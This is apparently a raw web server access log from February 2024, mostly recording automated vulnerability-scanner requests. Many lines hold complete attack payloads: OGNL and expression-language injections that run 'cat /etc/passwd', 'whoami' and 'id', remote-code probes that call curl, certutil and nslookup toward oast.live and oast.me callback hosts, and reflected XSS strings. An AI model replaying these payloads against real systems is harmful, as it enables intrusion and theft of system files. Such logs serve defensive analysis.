47.128.18.198 - - [19/Feb/2024:05:27:23 +0000] "GET /cagent/2934043245/AdventNetAgentToolkitCEdition6_0_SP_2_0.ppm HTTP/1.1" 404 4340 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 0 + 
142.93.184.8 - - [19/Feb/2024:16:34:36 +0000] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34" 4 - 
142.93.184.8 - - [19/Feb/2024:16:34:37 +0000] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36" 4 - 
142.93.184.8 - - [19/Feb/2024:16:39:03 +0000] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" 4 - 
142.93.184.8 - - [19/Feb/2024:16:39:03 +0000] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 4 - 
142.93.184.8 - - [19/Feb/2024:16:55:36 +0000] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 301 4331 "-" "Mozilla/5.0 (X11; CrOS x86_64 13310.93.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.133 Safari/537.36" 0 - 
142.93.184.8 - - [19/Feb/2024:16:55:36 +0000] "GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 301 4331 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61" 0 - 
142.93.184.8 - - [19/Feb/2024:17:42:33 +0000] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36" 4 - 
142.93.184.8 - - [19/Feb/2024:17:42:33 +0000] "GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5" 4 - 
142.93.184.8 - - [19/Feb/2024:17:46:11 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22curl%20http://cn9nau4gm4363usl5b3gixfi77m6qfg7r.oast.live%22%29%7D__::.x/ HTTP/1.1" 301 4450 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0" 0 - 
142.93.184.8 - - [19/Feb/2024:17:46:11 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22curl%20http://cn9nau4gm4363usl5b3gbfhthc8e9jksw.oast.live%22%29%7D__::.x/ HTTP/1.1" 301 4450 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.43" 0 - 
142.93.184.8 - - [19/Feb/2024:17:46:15 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cn9nau4gm4363usl5b3gqzc5opp4iejqw.oast.live%22%29%7D__::.x/ HTTP/1.1" 301 4510 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50" 0 - 
142.93.184.8 - - [19/Feb/2024:17:46:15 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cn9nau4gm4363usl5b3gydkxnhgcss1fx.oast.live%22%29%7D__::.x/ HTTP/1.1" 301 4510 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15" 0 - 
142.93.184.8 - - [19/Feb/2024:18:52:43 +0000] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 301 4193 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84" 0 - 
142.93.184.8 - - [19/Feb/2024:18:52:43 +0000] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 301 4193 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_14_6) AppleWebKit/600.6.27 (KHTML, like Gecko) Version/10.4 Safari/620.5.5" 0 - 
142.93.184.8 - - [19/Feb/2024:19:01:18 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0" 4 - 
142.93.184.8 - - [19/Feb/2024:19:01:18 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/9.1.2 Safari/602.2.14" 4 - 
142.93.184.8 - - [19/Feb/2024:19:01:27 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cn9nau4gm4363usl5b3gdq4ri7ygj9y99.oast.live%22%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 GTB7.0 ( .NET CLR 3.5.30729)" 4 - 
142.93.184.8 - - [19/Feb/2024:19:01:27 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cn9nau4gm4363usl5b3gtodti4uhjtkkf.oast.live%22%29%7D/ HTTP/1.1" 404 37865 "-" "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0" 4 - 
142.93.184.8 - - [19/Feb/2024:19:18:53 +0000] "GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12" 0 - 
142.93.184.8 - - [19/Feb/2024:19:18:54 +0000] "GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44" 0 - 
142.93.184.8 - - [19/Feb/2024:19:18:58 +0000] "GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0" 0 - 
142.93.184.8 - - [19/Feb/2024:19:18:58 +0000] "GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 301 4323 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:104.0) Gecko/20001904 Firefox/104.0" 0 - 
39.173.105.140 - - [19/Feb/2024:19:22:43 +0000] "GET /mysql_agent/3176942/AdventNet_Micro_Agent_MySQL_SP-1_6.ppm HTTP/1.1" 301 554 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36" 0 - 
216.244.66.240 - - [19/Feb/2024:23:11:45 +0000] "GET /linux-monitor/79298080/WebNMS_SNMP_Agent_Manager_Linux_2_0_0.zip HTTP/1.1" 301 4189 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 0 + 
216.244.66.240 - - [19/Feb/2024:23:11:55 +0000] "GET /simulator/40763485/WebNMS_Simulation_Toolkit_Solaris.bin HTTP/1.1" 301 4203 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" 0 + 
182.74.243.49 - - [20/Feb/2024:01:14:23 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22curl%20http://cn9bqgf9v1pn86s4ohp0ccfo3o6or615z.oast.me%22%29%7D__::.x/ HTTP/1.1" 404 4093 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 0 - 
182.74.243.49 - - [20/Feb/2024:01:14:33 +0000] "GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22certutil%20-urlcache%20-split%20-f%20http://cn9bqgf9v1pn86s4ohp0f8gku7jiz5cgm.oast.me%22%29%7D__::.x/ HTTP/1.1" 404 4093 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/9.1.2 Safari/603.1.30" 0 -